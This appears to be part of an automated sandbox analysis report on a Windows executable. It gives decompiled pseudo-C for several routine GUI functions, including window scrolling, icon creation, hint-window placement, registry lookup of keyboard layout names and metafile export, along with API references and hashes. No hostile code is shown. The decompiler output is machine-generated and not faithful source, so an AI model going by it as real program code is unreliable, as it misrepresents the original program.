                                                                                • GetVersion.KERNEL32(00000000,004456C3), ref: 00445504
                                                                                  • Part of subcall function 0044596C: CreatePopupMenu.USER32(?,0044567F,00000000,00000000,004456C3), ref: 00445987
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$CreateInsertItemPopupVersion
                                                                                • String ID: ,$?
                                                                                • API String ID: 133695497-2308483597
                                                                                • Opcode ID: 3988cf044ec6df4286f32fd7ac8835f7c3f34a54fe678dbaec8ea00de5f63395
                                                                                • Instruction ID: 3d737bce33b9b63eca678c529a0aeb9621d3b228851bcedd8045e0118eaffb15
                                                                                • Opcode Fuzzy Hash: 3988cf044ec6df4286f32fd7ac8835f7c3f34a54fe678dbaec8ea00de5f63395
                                                                                • Instruction Fuzzy Hash: 7A611270A006449BEF10EFB9D88166E7BF6AF49304F45407AE944E7397E738D845C748
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045E014, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E0045E014(void* __eax, int __ecx, signed int __edx, char _a4) {
				signed int _v8;
				signed int _v12;
				struct tagRECT _v28;
				char _v44;
				int _t90;
				void* _t112;
				void* _t125;
				void* _t131;
				intOrPtr _t142;
				int _t143;

				_t143 = __ecx;
				_v8 = __edx;
				_t125 = __eax;
				_t2 =  &_a4; // 0x45e1e1
				_t142 =  *_t2;
				_v12 = 2;
				if( *((char*)(__eax + 0x28c)) == 0) {
					_v12 = _v12 | 0x00000004;
				}
				_t147 = _t143;
				if(_t143 != 0) {
					__eflags = _v8;
					if(__eflags != 0) {
						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)), 0,  &_v28,  *((intOrPtr*)(_t142 + 0x34)));
						ScrollWindowEx(E0043BD14(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
						__eflags = 0;
						E00412984(0,  *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
						ScrollWindowEx(E0043BD14(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
						_t90 = ScrollWindowEx(E0043BD14(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
					} else {
						E00412984(0,  *((intOrPtr*)(_t142 + 0xc)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
						_t90 = ScrollWindowEx(E0043BD14(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
					}
				} else {
					if(E004037B0(_t125, _t147) != 0) {
						_push( *((intOrPtr*)(_t142 + 0x3c)));
						_push( &_v28);
						_push(E004350A4(_t125) -  *((intOrPtr*)(_t142 + 4)));
						_t112 = E004350A4(_t125);
						__eflags = 0;
						_pop(_t131);
						E00412984(_t112 -  *((intOrPtr*)(_t142 + 0xc)), _t131, 0);
						_v8 =  ~_v8;
					} else {
						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)), 0,  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
					}
					_t90 = ScrollWindowEx(E0043BD14(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
				}
				_t149 =  *(_t125 + 0x249) & 0x00000010;
				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
					return _t90;
				} else {
					E0045F820(_t125,  &_v44);
					return E0045D710(_t125,  &_v44, _t149);
				}
			}













                                                                                0x0045e01d
                                                                                0x0045e01f
                                                                                0x0045e022
                                                                                0x0045e024
                                                                                0x0045e024
                                                                                0x0045e027
                                                                                0x0045e035
                                                                                0x0045e037
                                                                                0x0045e037
                                                                                0x0045e03b
                                                                                0x0045e03d
                                                                                0x0045e0b5
                                                                                0x0045e0b9
                                                                                0x0045e105
                                                                                0x0045e128
                                                                                0x0045e13b
                                                                                0x0045e13d
                                                                                0x0045e15d
                                                                                0x0045e173
                                                                                0x0045e195
                                                                                0x0045e0bb
                                                                                0x0045e0cb
                                                                                0x0045e0eb
                                                                                0x0045e0eb
                                                                                0x0045e03f
                                                                                0x0045e04c
                                                                                0x0045e068
                                                                                0x0045e06c
                                                                                0x0045e077
                                                                                0x0045e07a
                                                                                0x0045e082
                                                                                0x0045e084
                                                                                0x0045e085
                                                                                0x0045e08a
                                                                                0x0045e04e
                                                                                0x0045e05e
                                                                                0x0045e05e
                                                                                0x0045e0ab
                                                                                0x0045e0ab
                                                                                0x0045e19a
                                                                                0x0045e1a1
                                                                                0x0045e1bd
                                                                                0x0045e1a3
                                                                                0x0045e1a8
                                                                                0x00000000
                                                                                0x0045e1b2

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ScrollWindow
                                                                                • String ID: E
                                                                                • API String ID: 2126015319-2089609516
                                                                                • Opcode ID: a5590fd15d7490c7741a77b52d45b22a4dfcd2a404514be6f2ab8c321c5b2fcc
                                                                                • Instruction ID: 59567550c3053fb61c417f11c068a5971746d9c38f0f71f24a54f4a7561ce20a
                                                                                • Opcode Fuzzy Hash: a5590fd15d7490c7741a77b52d45b22a4dfcd2a404514be6f2ab8c321c5b2fcc
                                                                                • Instruction Fuzzy Hash: 3D510071A00509BBDB04DA99CD82FEFB7ACEF48304F405126BA05E7681CB78E955CBE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00420CEC, Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E00420CEC() {
				struct HINSTANCE__* _t145;
				long _t166;
				intOrPtr _t167;
				intOrPtr _t186;
				void* _t192;
				BYTE* _t193;
				BYTE* _t196;
				intOrPtr _t197;
				void* _t198;
				intOrPtr _t199;

				 *((intOrPtr*)(_t198 - 0x24)) = 0;
				 *((intOrPtr*)(_t198 - 0x20)) = E00420B60( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
				if(_t192 > 0) {
					_t197 = 1;
					do {
						_t167 = E00420B60( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E00420B6C( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
						}
						_t197 = _t197 + 1;
						_t192 = _t192 - 1;
						_t204 = _t192;
					} while (_t192 != 0);
				}
				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
				 *((intOrPtr*)(_t198 - 0x2c)) = E00408330(( *(_t198 - 0x40))[8], _t204);
				 *[fs:eax] = _t199;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x420ed3, _t198);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
				E004209A4( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
				 *(_t198 - 0x30) = E00408330( *((intOrPtr*)(_t198 - 0x18)), _t204);
				_push(_t198);
				_push(0x420eb0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_t193 =  *(_t198 - 0x30);
				_t196 =  &(( *(_t198 - 0x30))[_t166]);
				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
				DeleteObject( *(_t198 - 0x34));
				DeleteObject( *(_t198 - 0x38));
				_t145 =  *0x487714; // 0x400000
				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
					E00420114(_t166);
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(E00420EB7);
				return E0040274C( *(_t198 - 0x30));
			}













                                                                                0x00420cee
                                                                                0x00420cfd
                                                                                0x00420d03
                                                                                0x00420d06
                                                                                0x00420d08
                                                                                0x00420d0d
                                                                                0x00420d1e
                                                                                0x00420d23
                                                                                0x00420d4a
                                                                                0x00420d4d
                                                                                0x00420d4d
                                                                                0x00420d50
                                                                                0x00420d51
                                                                                0x00420d51
                                                                                0x00420d51
                                                                                0x00420d0d
                                                                                0x00420d5f
                                                                                0x00420d6b
                                                                                0x00420d77
                                                                                0x00420d85
                                                                                0x00420d93
                                                                                0x00420dad
                                                                                0x00420dc0
                                                                                0x00420dcf
                                                                                0x00420dde
                                                                                0x00420ded
                                                                                0x00420dfd
                                                                                0x00420e0c
                                                                                0x00420e14
                                                                                0x00420e1f
                                                                                0x00420e24
                                                                                0x00420e25
                                                                                0x00420e2a
                                                                                0x00420e2d
                                                                                0x00420e30
                                                                                0x00420e36
                                                                                0x00420e3e
                                                                                0x00420e4c
                                                                                0x00420e55
                                                                                0x00420e5e
                                                                                0x00420e7a
                                                                                0x00420e88
                                                                                0x00420e90
                                                                                0x00420e92
                                                                                0x00420e92
                                                                                0x00420e99
                                                                                0x00420e9c
                                                                                0x00420e9f
                                                                                0x00420eaf

                                                                                APIs
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00420DDE
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00420DED
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 00420E3E
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 00420E4C
                                                                                • DeleteObject.GDI32(?), ref: 00420E55
                                                                                • DeleteObject.GDI32(?), ref: 00420E5E
                                                                                • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 00420E80
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                • String ID:
                                                                                • API String ID: 1030595962-0
                                                                                • Opcode ID: e9eab2e68ea044c9ea156f889c624f8d8221665ec8abac608e602645b7b127a8
                                                                                • Instruction ID: d2be98027a47b0f60a69fa7761058e0b512e7efa375e76c795a88d23bc60e875
                                                                                • Opcode Fuzzy Hash: e9eab2e68ea044c9ea156f889c624f8d8221665ec8abac608e602645b7b127a8
                                                                                • Instruction Fuzzy Hash: F1610671A00218AFCB00DFA9D881AAEBBF9FF49304B514466F804FB352D739AD51CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043D260, Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E0043D260(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t85;
				void* _t113;
				intOrPtr _t129;
				intOrPtr _t138;
				void* _t141;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t113 = __ecx;
				_v8 = __eax;
				_t138 =  *0x486dac; // 0x487c00
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t141);
				_push(0x43d427);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xffffffe0;
				E004356D0(_v8, __ecx, __ecx, _t138);
				_v16 = _v16 + 4;
				E004368EC(_v8,  &_v28);
				if(E004531E8() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E004531E8() -  *(_v8 + 0x4c);
				}
				if(E004531F4() <  *(_v8 + 0x48) + _v28) {
					_v28 = E004531F4() -  *(_v8 + 0x48);
				}
				if(E004531DC() > _v28) {
					_v28 = E004531DC();
				}
				if(E004531D0() > _v16) {
					_v16 = E004531D0();
				}
				SetWindowPos(E0043BD14(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E004045D8(_t113) < 0x64 &&  *0x46b8cc != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E004404B4( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x46b8cc(E0043BD14(_v8), 0x64,  *0x0046B9D4 | 0x00040000);
					}
				}
				ShowWindow(E0043BD14(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t129);
				 *[fs:eax] = _t129;
				_push(0x43d42e);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t85 = _v8;
				 *((char*)(_t85 + 0x210)) = 0;
				return _t85;
			}















                                                                                0x0043d26e
                                                                                0x0043d26f
                                                                                0x0043d270
                                                                                0x0043d271
                                                                                0x0043d272
                                                                                0x0043d274
                                                                                0x0043d277
                                                                                0x0043d280
                                                                                0x0043d289
                                                                                0x0043d28a
                                                                                0x0043d28f
                                                                                0x0043d292
                                                                                0x0043d29a
                                                                                0x0043d29f
                                                                                0x0043d2a9
                                                                                0x0043d2c0
                                                                                0x0043d2cf
                                                                                0x0043d2cf
                                                                                0x0043d2e4
                                                                                0x0043d2f3
                                                                                0x0043d2f3
                                                                                0x0043d300
                                                                                0x0043d309
                                                                                0x0043d309
                                                                                0x0043d316
                                                                                0x0043d31f
                                                                                0x0043d31f
                                                                                0x0043d345
                                                                                0x0043d35d
                                                                                0x0043d385
                                                                                0x0043d38e
                                                                                0x0043d39d
                                                                                0x0043d3a6
                                                                                0x0043d3b4
                                                                                0x0043d3bf
                                                                                0x0043d3bf
                                                                                0x0043d3bf
                                                                                0x0043d3e3
                                                                                0x0043d3e3
                                                                                0x0043d38e
                                                                                0x0043d3f4
                                                                                0x0043d3fe
                                                                                0x0043d403
                                                                                0x0043d406
                                                                                0x0043d409
                                                                                0x0043d416
                                                                                0x0043d41c
                                                                                0x0043d41f
                                                                                0x0043d426

                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043D427), ref: 0043D345
                                                                                • GetTickCount.KERNEL32 ref: 0043D34A
                                                                                • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043D385
                                                                                • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043D39D
                                                                                • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043D3E3
                                                                                • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043D427), ref: 0043D3F4
                                                                                • GetTickCount.KERNEL32 ref: 0043D40E
                                                                                  • Part of subcall function 004404B4: GetCursorPos.USER32(?), ref: 004404B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                • String ID:
                                                                                • API String ID: 3024527889-0
                                                                                • Opcode ID: ceb493bec2d905fdef923c3c531a51f5c382aecc693b1b4a997a9dade46dbdfe
                                                                                • Instruction ID: 893ef75b31aebc2a37a936a1955b57e4fbaaa27f92c468afc2ea37a70f40a7ca
                                                                                • Opcode Fuzzy Hash: ceb493bec2d905fdef923c3c531a51f5c382aecc693b1b4a997a9dade46dbdfe
                                                                                • Instruction Fuzzy Hash: BB517574A00109EFDB10DFA9C982A9EB7F4EF49304F204466F940E7391D779AE40CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453434, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00453434(intOrPtr __eax, void* __ebx) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;

				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x4535df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x4535e6);
					return E00404320( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403584(1);
					E00404320(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E00415F54( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00440924( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00409220( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x45359b);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404588( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404588(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x4535a2);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}




















                                                                                0x00453435
                                                                                0x00453437
                                                                                0x00453440
                                                                                0x00453446
                                                                                0x0045344b
                                                                                0x0045344c
                                                                                0x00453451
                                                                                0x00453454
                                                                                0x0045345e
                                                                                0x004535c0
                                                                                0x004535c8
                                                                                0x004535cb
                                                                                0x004535ce
                                                                                0x004535de
                                                                                0x00453464
                                                                                0x00453473
                                                                                0x0045347c
                                                                                0x0045348f
                                                                                0x00453492
                                                                                0x004535af
                                                                                0x004535b5
                                                                                0x004535bb
                                                                                0x00000000
                                                                                0x00453498
                                                                                0x00453499
                                                                                0x004534a2
                                                                                0x004534a5
                                                                                0x004534b1
                                                                                0x00000000
                                                                                0x004534b7
                                                                                0x004534c9
                                                                                0x004534cf
                                                                                0x004534f9
                                                                                0x00000000
                                                                                0x004534ff
                                                                                0x00453501
                                                                                0x00453502
                                                                                0x00453507
                                                                                0x0045350a
                                                                                0x0045350d
                                                                                0x00453533
                                                                                0x00453546
                                                                                0x0045355e
                                                                                0x0045356c
                                                                                0x0045357f
                                                                                0x0045357f
                                                                                0x0045356c
                                                                                0x00453586
                                                                                0x00453589
                                                                                0x0045358c
                                                                                0x0045359a
                                                                                0x0045359a
                                                                                0x004534f9
                                                                                0x00000000
                                                                                0x004535a2
                                                                                0x004535a2
                                                                                0x004535a6
                                                                                0x004535a6
                                                                                0x004535a6
                                                                                0x00000000
                                                                                0x004534a5
                                                                                0x00453492
                                                                                0x00000000

                                                                                APIs
                                                                                • GetKeyboardLayoutList.USER32(00000040,?,00000000,004535DF,?,022E0F1C,?,00453641,00000000,?,00437C4F), ref: 0045348A
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004534F2
                                                                                • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0045359B,?,80000002,00000000), ref: 0045352C
                                                                                • RegCloseKey.ADVAPI32(?,004535A2,00000000,?,00000100,00000000,0045359B,?,80000002,00000000), ref: 00453595
                                                                                Strings
                                                                                • layout text, xrefs: 00453523
                                                                                • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004534DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                • API String ID: 1703357764-2652665750
                                                                                • Opcode ID: 6947dafba483a025d13b77e74c1a05237ebe01563b900a72a80e2a0971b0ec31
                                                                                • Instruction ID: 8d878b3f35002f07d186a4d1dffd632d93ff78f37112a753d71399f72f713053
                                                                                • Opcode Fuzzy Hash: 6947dafba483a025d13b77e74c1a05237ebe01563b900a72a80e2a0971b0ec31
                                                                                • Instruction Fuzzy Hash: 80414C74A0020DAFDB10DF55C981B9EB7F8EB48305F5144A6E904A7352E738AF44DB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422900, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 71%
                                                                                			E00422900(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t78;
				void* _t81;
				void* _t84;
				void* _t86;
				intOrPtr _t87;

				_t84 = _t86;
				_t87 = _t86 + 0xffffffdc;
				_t81 = __edx;
				_t66 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402EC8( &_v38, 0x16);
					_t68 =  *((intOrPtr*)(_t66 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t68 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_v18 = E00420F04( &_v38);
					_v16 = GetDC(0);
					_push(_t84);
					_push(0x422a3b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
					_v8 = E0040272C(_v12);
					_push(_t84);
					_push(0x422a1b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00420114(_t68);
					}
					E00416268(_t81, 0x16,  &_v38);
					E00416268(_t81, _v12, _v8);
					_pop(_t78);
					 *[fs:eax] = _t78;
					_push(E00422A22);
					return E0040274C(_v8);
				}
			}





















                                                                                0x00422901
                                                                                0x00422903
                                                                                0x00422908
                                                                                0x0042290a
                                                                                0x00422910
                                                                                0x00422a47
                                                                                0x00422916
                                                                                0x00422920
                                                                                0x00422925
                                                                                0x00422928
                                                                                0x0042292f
                                                                                0x00422936
                                                                                0x00422940
                                                                                0x00422938
                                                                                0x00422938
                                                                                0x00422938
                                                                                0x00422957
                                                                                0x0042296e
                                                                                0x0042297a
                                                                                0x00422985
                                                                                0x0042298a
                                                                                0x0042298b
                                                                                0x00422990
                                                                                0x00422993
                                                                                0x004229a9
                                                                                0x004229b4
                                                                                0x004229b9
                                                                                0x004229ba
                                                                                0x004229bf
                                                                                0x004229c2
                                                                                0x004229df
                                                                                0x004229e1
                                                                                0x004229e1
                                                                                0x004229f0
                                                                                0x004229fd
                                                                                0x00422a04
                                                                                0x00422a07
                                                                                0x00422a0a
                                                                                0x00422a1a
                                                                                0x00422a1a

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,?,000009EC), ref: 00422952
                                                                                • MulDiv.KERNEL32(?,?,000009EC), ref: 00422969
                                                                                • GetDC.USER32(00000000), ref: 00422980
                                                                                • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,00422A3B,?,00000000,?,?,000009EC,?,?,000009EC), ref: 004229A4
                                                                                • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,00422A1B,?,?,00000000,00000000,00000008,?,00000000,00422A3B), ref: 004229D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
